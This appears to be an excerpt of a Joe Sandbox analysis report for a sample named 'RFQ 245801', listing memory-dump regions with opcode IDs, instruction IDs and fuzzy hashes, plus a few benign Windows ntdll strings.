                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E0D832244145ABD3E15B698808B66F7A5EBD47A0F150429EA0A8B150FBF0DDC0C7E8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 14d873a0cad315b37c7714773860f12b4165bb40ec7a669b5c6aa37f6a411d80
                                                                                                                                                                                  • Instruction ID: 8295c67d41e19dcaaf613340c6ce68670795bb76842adec8c6cc4c54274ca35d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 14d873a0cad315b37c7714773860f12b4165bb40ec7a669b5c6aa37f6a411d80
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF02B31A255918FE772D72CD944F53F7E1AF10630F0A055CD50287B12C320DC40C650
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                                                                  • Instruction ID: 35699baf5041f521e87f2e440c011da16d1bf4ebad1990aad3838bfa3e11d843
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                                                                  • Instruction Fuzzy Hash: E7D0A731501109CBDF27CF08C510E2EFA78FF20A41F50006CEB0051030E378ED01CA00
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                  • Instruction ID: 6c3991655045e4bce9ee4161ec9900442ba4524de228c90053e02e52355a2483
                                                                                                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5D0C935256E80CFD61BCB0CC5A4F15B3A8BB84B44F8104D0F402CBB22D66CD940CA00
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                  • Instruction ID: 0e32b51943ece1c2e8244a01b90d73fcaf6bc13fe0cf665c3abf4282aea1fbb9
                                                                                                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                  • Instruction Fuzzy Hash: 94C01232150644AFC7119A95CD01F0177A9E798B40F000421F20447571C535E810D644
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                  • Instruction ID: c040c1c995ea8c74d2756d216bfd520b6850d84bf7bb8be5e1f410fa7d5b39c2
                                                                                                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BD01236100248EFCB01DF41C890D9ABB2AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                  • Instruction ID: e11e849fc49f1ea090c857721c97b72101e0f2bde606ff22fae08da391387c4a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DC04C797115458FCF15DB19D298F45B7E4F744750F1508D0E805CB722E624E841CA10
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 29405e3384a7753a84af1dabeb16da14ba0d74455aafed1850786b6f6e45e4f8
                                                                                                                                                                                  • Instruction ID: 151623b109fa8e559b6715744bb265f27a38d42bff7df8fc593afbf0e4c60735
                                                                                                                                                                                  • Opcode Fuzzy Hash: 29405e3384a7753a84af1dabeb16da14ba0d74455aafed1850786b6f6e45e4f8
                                                                                                                                                                                  • Instruction Fuzzy Hash: F8900231609900129640715888885468005A7E0301F56C031E0424564CCA148B565362
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7eb62cf5dd73879dc9a40d521104e503e33ec8ada295cb34fb69a4d114e31b08
                                                                                                                                                                                  • Instruction ID: d3212ac0034a23b53360300ce51f5e44225d8bf62cc46839888b3f953eb4d329
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eb62cf5dd73879dc9a40d521104e503e33ec8ada295cb34fb69a4d114e31b08
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A90026160560042464071588808406A005A7E1301796C135A0554570CC6188A55936A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ceb4971e21628a8e668e6e36dcdadbf680cabff2ae5f6e7d7b8e82df15f543b4
                                                                                                                                                                                  • Instruction ID: 3c2aacf0cd395cd03a4af7e9b45b3b430fa098cd9380c7b7f42c0b91a8ce04c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb4971e21628a8e668e6e36dcdadbf680cabff2ae5f6e7d7b8e82df15f543b4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0090023120954842D64071588408A46401597D0305F56C031A00646A4DD6258F55B762
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
                                                                                                                                                                                  • Instruction ID: 0715c8951cf3d83ece13f569c07865cf7debaee774d1d52b7b7e51d49cd6ffa3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B90023160950802D65071588418746400597D0301F56C031A0024664DC7558B5577A2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
                                                                                                                                                                                  • Instruction ID: 01cc52ba4426bd97b257de4e048b0990d000cc8fa79a75e4694c56b58a59a67d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
                                                                                                                                                                                  • Instruction Fuzzy Hash: CB90023120550802D60471588808686400597D0301F56C031A6024665ED6658A917232
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
                                                                                                                                                                                  • Instruction ID: 0dc78222d005ba8d6fc12aa139e0184226f1e869cb76721644ed2cc9570cc3f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 57900225225500020645B558460850B4445A7D6351796C035F14165A0CC6218A655322
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
                                                                                                                                                                                  • Instruction ID: 6f2e07dee98cd8bf884e6ddc7aa62b9783fa0cf27d1e58f7a2f2cbbd6e326979
                                                                                                                                                                                  • Opcode Fuzzy Hash: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 679002A1205640924A00B258C408B0A850597E0201F56C036E1054570CC5258A519236
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
                                                                                                                                                                                  • Instruction ID: d1b9f3c2becbd4ca080476e09a9f81f5a6713616d13964468c6d120985579784
                                                                                                                                                                                  • Opcode Fuzzy Hash: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0290022120954442D6007558940CA06400597D0205F56D031A10645A5DC6358A51A232
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
                                                                                                                                                                                  • Instruction ID: 67e486a376a67d209709cf6e86177a22ac7af6c7ac83084a2ed1fe598b90c907
                                                                                                                                                                                  • Opcode Fuzzy Hash: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5290023124550402D641715884086064009A7D0241F96C032A0424564EC6558B56AB62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
                                                                                                                                                                                  • Instruction ID: 3ca6a72b81cc27c48992b0729550830b8596078c5e18eb089da1a43cab948ca8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A90023120550842D60071588408B46400597E0301F56C036A0124664DC615CA517622
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                                                                                                                                                                  • Instruction ID: 2d8c70de2c4e6fd9f603f94b09dc5cc648541451a9338d66aa5e7007801324f7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C90023120550403D6007158950C707400597D0201F56D431A0424568DD6568A516222
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                                                                                                                                                                  • Instruction ID: 88a58601332487e2cc11f22204d0e4de25c0b2b556fee5fef840dfd8f33e2298
                                                                                                                                                                                  • Opcode Fuzzy Hash: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8190022160950402D6407158941C706401597D0201F56D031A0024564DC6598B5567A2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                                                                                                                                                                  • Instruction ID: 012a6eecdc388d8edb39fe489f768273fdac9bf558ef43055c4e1d0831f27bcc
                                                                                                                                                                                  • Opcode Fuzzy Hash: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F90026121550042D60471588408706404597E1201F56C032A2154564CC5298E615226
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                                                                                                                                                  • Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
                                                                                                                                                                                  • Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                                                                                                                                                  • Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                                                                                                  • Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                                                                                                  • Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
                                                                                                                                                                                  • Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                                                                                                  • Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
• Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
• Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
• Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
• Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
• Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
• Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
• Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
• Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
• Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
• Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
• Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
• Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
• Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
• Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
• Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
• Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
• Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
• Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
• Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
• Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
• Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
Strings
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
• CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
• Execute=1, xrefs: 01794713
